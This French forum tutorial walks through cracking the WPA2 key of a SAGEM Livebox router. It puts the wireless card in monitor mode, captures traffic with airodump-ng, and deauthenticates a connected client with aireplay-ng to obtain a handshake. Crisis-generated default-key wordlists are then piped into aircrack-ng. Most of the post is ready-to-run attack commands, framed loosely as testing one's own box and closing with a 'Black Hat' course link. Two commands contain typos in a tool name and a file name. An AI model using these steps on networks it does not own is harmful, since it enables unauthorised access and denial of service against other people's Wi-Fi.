Auteur Sujet: [TUTO] Cracker une Livebox SAGEM avec Crisis Wordlist Generator et Aircrack  (Lu 12129 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne Teeknofil

  • Contributeur de Kali-linux.fr
  • Membre sérieux
  • *****
  • Messages: 368
  • +28/-6
    • https://www.youtube.com/watch?v=R-zrnglcNuA&list=PLeu60bO1b61HE25L8Sz-cC7xjFupaSuWc

Pour commencer vous devez trouver le nom de votre carte wifi dans linux avec votre terminal.

root@kali:~# iwconfig
eth0      no wireless extensions.

wlan0   IEEE 802.11bg  ESSID:off/any 
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on
         
lo        no wireless extensions.


Vous devez mettre votre carte Wi-Fi en mode monitor. Le mode monitor permet d'analyser tous les ondes Wi-Fi qui sont destinées ou non a votre carte Wi-Fi. Il est conseillé de stopper quelque processus réseaux de votre système Linux qui peuvent interférer avec le bon fonctionnement de votre carte Wi-Fi en mode monitor.

root@kali:~# service network-manager stop
root@kali:~# service avahi-daemon stop
root@kali:~# service upstart-udev-bridge stop
root@kali:~# rfkill unblock all


Ces commandes ci-dessus sont facultatives et permettent d’anticiper d'éventuel bug avec certaines cartes Wi-Fi. Dans tous les cas je vous recommande tapez la commande ci-dessous avant de mette votre carte Wi-Fi en mode monitor.

root@kali:~# airmon-ng check kill

Maintenant vous pouvez mettre votre carte Wi-Fi en mode monitor.


root@kali:~# airmon-ng start wlan0

Pour trouver le nom de votre carte Wi-Fi en mode monitor tapait à nouveau dans votre terminal airmon-ng.

root@kali:~# airmon-ng

PHY Interface   Driver      Chipset`

phy1    wlan0mon    rtl8187     Realtek Semiconductor Corp. RTL8187


Dans une nouvelle fenêtre de votre terminal Linux cherchait votre Livebox protégé par WPA 2.


root@kali:~# airodump-ng --encrypt CCMP wlan0mon

Quand vous avez localisé votre Livebox, il faut sniffer votre AP. Il faut enregistrer le trafic avec l'option -w pour capturer une poignée de main (WPA handshake) entre un client et votre Livebox. Vous devez aussi fixer le channel avec l'option -c pour enregistrer correctement le trafic.


Vous pouvez trouver le channel dans le précédent scan avec Airodump-ng dans la colonne CH. Il faut aussi filtrer le réseau à sniffer avec l'adresse MAC de votre Livebox grâce à l'option --bssid. L'option --essid est facultatif mais elle conseillé pour éviter de sniffer un autre réseau par erreur.

root@kali:~# airodump-ng -w 1 -c 6 --bssid 00:19:70:??:??:?? --essid Livebox-XXXX   wlan0mon

Quand une adresse MAC est affichée sous la colonne STATION vous pouvez lancer une attaque de dénie de service avec Aireplay-ng pour capturer une poignée de main (WPA handshake).


L'option -0 est l'attaque de dénie de service d'Aireplay-ng, dans l'exemple ci-dessous nous envoyons 15 paquets de déconnexion. L'option -a est l'adresse MAC de votre Livebox.

L'option -c est l'adresse MAC de la station connecté à votre Livebox que nous devons déconnecter pour capturer une poignée de main (WPA handshake).

root@kali:~# aireplay-ng -0 15 -a 00:19:70:??:??:?? -c ??:??:??:??:??:?? wlan0mon

Si dans la fenêtre du terminal où d'Airodump-ng enregistre le réseau vous voyez WPA handshake s'afficher avec l'adresse MAC de votre Livebox c'est que votre attaque a réussi.

CH  6 ][ Elapsed: 8 mins ][ 2016-01-28 19:28 ][ WPA handshake: 00:19:70:??:??:??

Si votre attaque avec Aireplay-ng échoue c'est peut-être que la station n'est pas configuré pour se reconnecter automatiquement à votre Livebox en cas de déconnexion ce qui rend l'attaque impossible.


Maintenant nous pouvons tenter de décrypter la clé WPA contenu dans le fichier 1-01.cap. Pour rendre notre attaque plus efficace nous devons déterminer le firmware de votre Livebox. Dans un terminal Linux tapez :
root@kali:~# wireshark -r 1-01.cap

Appliquer ce filtre dans le champ filter avec le nom wifi de votre livebox.

wlan_mgt.ssid = Livebox-xxxx

Cliquer sur une trame réseau et dérouler les informations "IEEE 802.11 wireless LAN management frame" > "Tagged parameters xxx bytes" > "Tag : Vendor Specific : Microsoft : WPS". Vérifier si le "Serial Number" commence par les lettres LK. Si c'est le cas le générateur de clé WPA Livebox de crisis fonctionne sur votre modèle de Livebox.

Vous pouvez donc tenter de décrypter votre clé WPA avec cette commende :

root@kali:~# crisis -6 -f livebox-sagem -u | airecrack-ng -e Livebox-xxxx -w- 1.01.cap

Dans le cas où votre Livebox n'est pas vulnérable au générateur de clé de crisis, vous pouvez faire une attaque avec les options par défaut de crisis wordlist generator avec cette commande :


root@kali:~#  crisis -3 -l 26 -f hex-upper -u | aircrack-ng  -e Livebox-XXXX -w- 1-01.cap


Bon teste.
Hacking Debutant - Black Hat Ackademy : https://www.udemy.com/draft/2365526/?couponCode=PROMOTION